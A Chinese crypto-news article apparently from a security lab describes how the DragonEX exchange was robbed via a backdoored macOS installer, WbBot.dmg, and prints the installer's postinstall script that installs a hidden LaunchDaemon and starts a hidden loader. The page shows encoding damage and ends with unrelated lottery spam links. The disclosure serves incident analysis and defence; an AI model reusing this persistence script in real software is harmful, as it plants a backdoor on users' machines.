专注区块链信息及金融服务

DragonEX交易所真相独家披露,还原被盗全过程 | 火星号精选

降维安全实验室 ·

03月28日

热度: 14993

DragonEX交易所真相独家披露,降维安全实验室还原被盗全过程

00:00
--:--

?#24405;?/h3>

近日,DragonEx龙网交易所安全?#24405;?#20013;,降维安全实验室(johnwick.io)第一时间与龙网积极取得联系,与龙网一起分析和确认,?#22836;?#26366;经从陌生人处获取并打开了一个Apple OS X下“交易软件”安装包WbBot.dmg (SHA256哈希****7DEC218E815A6EB399E3B559A8962EE46418A4E765D96D352335********),此安装包经降维安全实验室技术分析存在捆绑后门,黑客通过此安装包内后门获取内部人员权限渗透进内网进而成功获取数字货币钱包私钥。

分析

此dmg样本经过层层解包,最终层次结构如下:

其中的postinstall(绿色高亮)是后门的bash安装脚本,内容如下:

#! /bin/sh
mv /Applications/WbBot.app/Contents/Resources/.com.wbbot.plist /Library/LaunchDaemons/com.wbbot.plist
/Applications/WbBot.app/Contents/Resources/.loader PackageValidate &

可见,该后门本体就是位于WbBot.app/Contents/Resources/.loader(蓝色高亮行,SHA256哈希:****107c09f591a11e5e347acad5b47c70ff5d5641a01647854643e0********),

经过初步分析,确定为恶意后门!

小结

降维安全实验室认为这是一次典型的专业级黑客攻击,降维安全实验室正在积极配合龙网追踪被盗资产,目前已经联系多家交易所,对被盗资产进行冻结处理,关于此?#24405;?#30340;更深入分析请关注降维安全实验室的后续报告,同时提醒其他数字货币交易所以及个人用户提升安全意识并且采取必要的安全策?#21592;?#25252;自身,不要轻易信任第三?#25509;?#25143;。

声明:本文为入驻“火星号”作者作品,不代表火星财经官方立场。转载请注明出处、作者和本文链接
提示?#21644;蹲视?#39118;险,入?#34892;?#35880;慎。本资讯不作为投资理财建议。

推广
相关新闻

涨幅榜

你可能?#34892;?#36259;的内容
下一篇

Eternal Token 项?#31185;?#32423;:B ,展望稳定 | TokenInsight

新疆18选7开奖结果
广西快乐双彩开奖公告查询 幸运农场走势结果图 街机急速赛车 吉林十一选五助手免费 香港赛马会足智彩 排列3预测网 中国体彩七星彩走势图 2019双色球054期杀红球 北京快三精准人工计划 内蒙古时时彩开奖号 北京市尾号限行规定 澳门ag真人怎么玩 搜狐彩票七星彩 河北20选5最走势图 彩票云南11选5开奖查询结果